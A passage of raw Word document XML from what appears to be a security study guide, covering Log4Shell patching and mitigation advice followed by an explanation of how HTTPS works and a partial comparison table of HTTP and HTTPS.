        <w:t>Log4j 2.15.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> release (and subsequent releases) patched this vulnerability. Updating to </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2.16.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or higher is recommended, as it fully disables the problematic JNDI lookups by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18479B71"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Temporary Workaround</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E22EE3C" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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f upgrading Log4j is not immediately possible, users could disable JNDI lookups altogether by setting the system property log4j2.formatMsgNoLookups to true, or by removing the JndiLookup class from the classpath.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1A1F67"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ecurity Patch Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E33A7AF" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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t's important to patch and test systems quickly, especially if they are exposed to the internet or are running high-value services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB4A264" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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For vulnerable systems, it's also critical to monitor and look for any indicators of compromise, as attackers may have exploited the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C6AA8C" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A899CFF"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Log4Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability caused widespread concern, with many organizations scrambling to patch affected systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5897D6"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It affected </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cloud services, web applications, and enterprise systems</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC5C53B"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Affected products included </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Solr, Elasticsearch</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and many other services using Log4j for logging.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372C5621" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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Key Steps for Organizations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF106D5"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Update Log4j</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the latest patched version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9FE0DC"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Monitor for exploitation attempts</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by checking logs and network traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F823CB3"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ssess and audit affected applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for potential breaches or compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525F84A1" w14:textId="77777777" w:rsidR="00574FE8"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5CDDB0D">
          <v:rect id="_x0000_i3643" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="356FFA04"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If you're working in a Java-based application, ensure that </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Log4j 2.x</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is updated to a secure version, or you can switch to a different logging framework like </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SLF4J</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6319FFF0" w14:textId="5225A60E" w:rsidR="00B66F22" w:rsidRPr="00CE4B95"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7CC5FA70">
          <v:rect id="_x0000_i3644" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7510D5CA" w14:textId="3E9996E9" w:rsidR="007D0768" w:rsidRPr="00CE4B95" w:rsidRDefault="00692C14">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="903" w:name="_Toc196308383"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is https protocol</w:t>
      </w:r>
      <w:r w:rsidR="007D0768" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="903"/>
    </w:p>
    <w:p w14:paraId="36F9DBE1" w14:textId="57192755" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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HTTPS (Hypertext Transfer Protocol Secure)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an extension of </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP (Hypertext Transfer Protocol)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It is used for secure communication over a computer network, particularly the internet. HTTPS ensures that the data exchanged between the client (typically a web browser) and the server remains private and secure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7516EA" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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How HTTPS Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FCD01E"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Encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C9092E" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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HTTPS uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSL (Secure Sockets Layer)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TLS (Transport Layer Security)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocols to encrypt the data transferred between the client and the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C721455" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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is encryption prevents third parties (such as hackers) from intercepting or tampering with the data during transit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F82ECED"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uthentication</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC81716" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">HTTPS uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>digital certificates</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to authenticate the identity of the website or server, ensuring the client is communicating with the intended server and not an impostor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532AA2C6" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is issued by a trusted </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Certificate Authority (CA)</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B36278"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Data Integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD55594" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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HTTPS ensures that the data sent and received is not altered or corrupted during transmission. This is done by using hash functions in the protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C41139D" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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HTTPS Process (Secure Connection Establishment):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579A49D2"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lient sends a request</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the server using HTTPS (e.g., https://www.example.com).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550EEAAF"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erver responds with a digital certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which includes the server's public key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384E1CE8"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lient verifies the certificate</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> against trusted Certificate Authorities to ensure the server’s identity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B7C840"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SL/TLS handshake</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> occurs, where the client and server agree on encryption methods and generate session keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5089FC2B"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ecure communication begins</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, with all data being encrypted using session keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589BCAF2" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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Benefits of HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC59122"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ecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155DC2C9" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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Encrypts sensitive data such as passwords, credit card numbers, personal information, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49064F31" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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Protects against </w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>man-in-the-middle</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MITM) attacks, where attackers intercept or alter data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1218F128"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rivacy</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E843A7" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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Prevents unauthorized parties from monitoring the communication between the client and the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26783962"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Trust</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3E24AA" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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Websites using HTTPS are often considered more trustworthy, as users can see the padlock symbol or "Secure" label in the browser's address bar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04117337" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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HTTPS is a signal of security, which can build user confidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7DB65C"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EO Benefits</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC9B5CB" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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Google gives a ranking boost to websites that use HTTPS, promoting a more secure internet overall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E502CCC" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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Key Difference between HTTP and HTTP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0"/>
        <w:gridCol w:w="2550"/>
        <w:gridCol w:w="4152"/>
      </w:tblGrid>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="360FD171" w14:textId="77777777" w:rsidTr="00574FE8">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14D37849" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FBA4AD6" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78D59DB3" w14:textId="77777777" w:rsidR="00574FE8" w:rsidRPr="00617E2C" w:rsidRDefault="00574FE8"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HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="1A960303" w14:textId="77777777" w:rsidTr="00574FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17E2A7CE"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rotocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D4C55D0"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Hypertext Transfer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2484ED72"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Hypertext Transfer Protocol Secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00617E2C" w:rsidRPr="00617E2C" w14:paraId="22C84EF0" w14:textId="77777777" w:rsidTr="00574FE8">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07FE4057"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ort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FF71090"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80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04433EAE"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443</w:t>
            </w:r>
          </w:p>
        </w:tc>
